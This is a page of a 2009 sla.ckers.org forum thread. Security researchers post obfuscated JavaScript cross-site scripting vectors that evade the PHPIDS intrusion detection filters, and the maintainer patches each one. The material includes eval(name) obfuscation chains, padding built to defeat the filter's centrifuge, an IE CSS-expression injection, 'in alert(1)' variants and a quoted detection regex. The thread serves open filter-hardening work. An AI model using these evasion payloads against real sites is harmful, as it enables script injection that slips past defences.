Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...1920212223242526272829...LastNext
Current Page: 24 of 31
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Anonymous User
Date: January 03, 2009 08:34PM

Nice indeed! Thx and fixed. Sorry - Gareth - couldn't let that happen :)

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: thornmaker
Date: January 03, 2009 10:07PM

with eval(name) goodness
new Array, new Array, new Array, new Array, new Array, new Array, new Array, new Array, new Array, new Array, new Array, new Array,
x=('e')
x=('nam')+(new Array)+x
y=('val')
y=('e')+(new Array)+y
z=this
z=z[y]
z(z(x)+x)

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: January 04, 2009 07:36AM

/Please submit the string\
to help us make the \
PHPIDS better./,y=('aler\
t'),x=this,x=x[y]
x('I cant let you have all the fun thornmaker'),/abc abc\
abc abc abc\
abc\
/,/abc abc\
abc abc abc\
abc\
/

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Anonymous User
Date: January 04, 2009 09:25AM

Arg - the backspace newlines... I knew they would backfire one day :) Nice ones! Fixed - but not that thorough right know. I will take a deeper look later. Thx!

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: January 05, 2009 03:02PM

undefined,undefined
undefined,undefined
undefined,undefined
undefined,undefined
x=('aler\
t')
undefined,undefined
undefined,undefined
undefined,undefined
undefined,undefined
this [x]
(1)
undefined,undefined
undefined,undefined
undefined,undefined
undefined,undefined

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: thornmaker
Date: January 05, 2009 03:35PM

Nice one Gareth :)

Here's a modified version of my previous one

new Array, new Array, new Array, new Array, new Array, new Array, new Array, new Array, new Array, new Array, new Array, new Array, new Array,
new Array, new Array, new Array, new Array, new Array, new Array, new Array, new Array, new Array, new Array, new Array,
x=('e')
x=('nam')+(new Array)+x
y=('val')
y=('e')+(new Array)+y
z=this
z=z[y]
z(z(x + new Array)+x)



Edited 1 time(s). Last edit at 01/05/2009 03:37PM by thornmaker.

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Anonymous User
Date: January 05, 2009 04:26PM

Nice ones indeed. Changed some bytes in the centrifuge - fixed.

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: thornmaker
Date: January 05, 2009 10:24PM

@.mario: interesting change. i changed some bytes in the filler material. your move.

xxx=('e')
xxx=('nam')+(new Array)+xxx
yyy=('val')
yyy=('e')+(new Array)+yyy
zzz=this
zzz=zzz[yyy]
zzz(zzz(xxx + new Array)+xxx)
xxx+yyy+zzz+xxx+yyy+zzz+xxx+yyy+zzz+xxx+yyy+
zzz+xxx+yyy+zzz+xxx+yyy+zzz+xxx+yyy+zzz+xxx+
yyy+zzz+xxx+yyy+zzz+xxx+yyy+zzz+xxx+yyy+zzz+
xxx+yyy+zzz+xxx+yyy+zzz+xxx+yyy+zzz+xxx+yyy+
zzz+xxx+yyy+zzz

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: thornmaker
Date: January 06, 2009 02:48AM

okay, i coulnd't wait, so i'm going out of turn.
location.assign(1?name+1:(x))


[edit:]
@.mario: could you explain to me why this injection doesn't match the regular expression:
(?:\d\s*[|&]{2}\s*\w)|(?:[=(].+\?.+:)|(?:with\([^)]*\)\))|(?:\.\s*source\W)|(?:\?[^:]+:[^;]+(;|$))

As far as I can tell, this injection should match the last part, \?[^:]+:[^;]+(;|$), and the second part, [=(].+\?.+:... (and at least one does if i remove the parenthesis from around the x which doesn't make much sense).



Edited 1 time(s). Last edit at 01/06/2009 03:20AM by thornmaker.

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Anonymous User
Date: January 06, 2009 03:48PM

Hi!

Phew - neat stuff. I had to do a little optimization on the centrifuge for robustness against padding obfuscation. I am too tired to look into the other issue right now - will do tomorrow.

Thx!

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: thornmaker
Date: January 12, 2009 02:57PM

I'm guessing something isn't working quite like it should: http://demo.phpids.org/?test=alert%20(0%29

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Matt Presson
Date: January 12, 2009 03:29PM

It seems that if only one space is present between the alert and the open paren that it passes through.

-----------------------------------------------------------------------
(ú=(θ='',[µ=!(Φ=!θ+{})+θ,Θ=Φ[ø=+!θ]+Φ[+θ],ĩ=µ[ø],Ø=µ[º=ø+++ø],Ç=Φ[º+ø],à=ú[Φ[º+º]+Φ[+θ]+Ç+ĩ]][Ø+Ç+Θ])())[ĩ+à('•êí')](Ç+à('Á«)'))



Edited 2 time(s). Last edit at 01/12/2009 03:36PM by Matt Presson.

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Anonymous User
Date: January 12, 2009 04:02PM

Ouch! Small but high impacted bug in the Converter. Fixed - thanks!

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: thornmaker
Date: January 12, 2009 08:08PM

are you sure there was just one bug? I haven't looked at the code base recently, but this one seemed too easy.
www=('e')
yyy=('val')
zzz=1+name
xxx=this
xxx[www+yyy](zzz)
xxx+yyy+zzz+xxx+yyy+zzz+xxx+yyy+zzz+xxx
'superStealthyCentrifugeAvoidanceTrick'
xxx+yyy+zzz+xxx+yyy+zzz+xxx+yyy+zzz+xxx
'andAgain'
xxx+yyy+zzz+xxx+yyy+zzz+xxx+yyy+zzz+xxx
'oneMoreTime'
xxx+yyy+zzz

In particular, I thought the filters would catch zzz=1+name or xxx=this or xxx[www+yyy](zzz).

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: vortex
Date: January 14, 2009 06:40AM

Awesome script ... I'm using it on a testbed (jailed) environment under BSD with no problems whatever. Still trying to work out the best critical "impact" level in order to protect my own back-end.

A couple of questions though...

1) Upon attempting to access the updated default_filter.xml and/or Convertor.php I receive a warning from firefox:
----
You have attempted to establish a connection with "svn.php-ids.org". However, the security certificate presented belongs to "(schokokeks.org , *.schokokeks.org)". It is possible, although unlikely, that someone may be trying to intercept your communication with this web site.
----
I'm hoping this is not me ...!

2) Assuming this can be rectified, is it permissible to run a cron job to update my own local master copies of these files on a (say) weekly basis?

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Anonymous User
Date: January 14, 2009 04:37PM

Hi!

@thornmaker: Neat. I will take care of this asap. I haven't found any time yet - but probably will do tomorrow.

@vortex: Thx!

1) Yep - that's our sponsor/hoster using a self signed cert afaik.

2) Yep. That's pretty much okay. The trunk revision can be seen as very stable. No commit without a full test run. We are using the trunk too.

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Anonymous User
Date: January 14, 2009 04:49PM

Well - couldn't keep myself back. New patterns in da house. Thx thornmaker!

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: thornmaker
Date: January 14, 2009 07:59PM

oops... i accidentally the whole ids
xxx=status
s=xxx+('')
eee=s+'e'
e=eee+'val'
n=s+'n'
n=n+'ame'
y=this
y=y[e]
y(y(n)+s)
xxx+eee+xxx+eee
'foo'
xxx+eee+xxx+eee
'foo'

...

xxx+eee+xxx+eee

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: January 30, 2009 10:50AM

IE only vector:-

http://www.businessinfo.co.uk/labs/phpids/phpids5.html

This rocks :D

This is the dom based injection:-
document.styleSheets(0).cssText+=name

The name payload contains:-
;body{xss:expression(window.x?0:(alert(/XSS/),window.x=1));}

Yes I spend far to much time looking through the js/css quirks of every browser ;)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: thornmaker
Date: January 30, 2009 11:32AM

what fun style sheets are :)

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Anonymous User
Date: January 30, 2009 01:38PM

And what fun IE is - fixed :)

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: January 30, 2009 01:56PM

Fixed so quickly, you spoil our fun :)
I was gonna html encode another one with js backslash escapes

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Anonymous User
Date: January 30, 2009 02:54PM

Rahaha - not allowed a js backslah encoded variant is :)

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: February 02, 2009 06:07AM

this.sdfgdfgsdfg,this.sdfgdfgsdfg,this.sdfgdfgsdfg,this.sdfgdfgsdfg
Infinity in alert(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: February 02, 2009 11:17AM

void 1 in alert(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: holiman
Date: February 02, 2009 12:34PM

A variant of that:

1 in alert(1)

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Anonymous User
Date: February 03, 2009 10:49AM

Eeeek - am not at home for the next days so I just added a quick-fix. Nice find!

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: February 03, 2009 11:10AM

this.sdfjhskajdhfkashdfkashdfasf in alert(1)

There are lots more:-

[this.dfkgjsdklfgjdsfgdsfgdfg].sdfjhskajdhfkashdfkashdfasf in alert(1)

'fgsdfgsdfg'.sdfkjsdkldfjkldsfg in alert(1)

stop.sdfgkldfsgsdfgsdfgdsfg in alert(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 02/03/2009 11:50AM by Gareth Heyes.

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Gareth Heyes
Date: February 03, 2009 01:57PM

Just for good measure ;)

http://www.businessinfo.co.uk/labs/phpids/phpids6.html

The actual vector is:-
'fgsdfgsdfg'.sdfkjsdkldfjkldsfg in eval(name,/gsdfgsdf/.sdfkjsdkldfjkldsfg)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 02/03/2009 01:58PM by Gareth Heyes.

Options: ReplyQuote
Re: PHPIDS (0.5.4 - the cool kid in the IDS class)
Posted by: Anonymous User
Date: February 08, 2009 05:26AM

Hey Gareth!

Those ones really generated some headche - but the in issue should be fixed now. Thanks!

Options: ReplyQuote
Pages: PreviousFirst...1920212223242526272829...LastNext
Current Page: 24 of 31


Sorry, only registered users may post in this forum.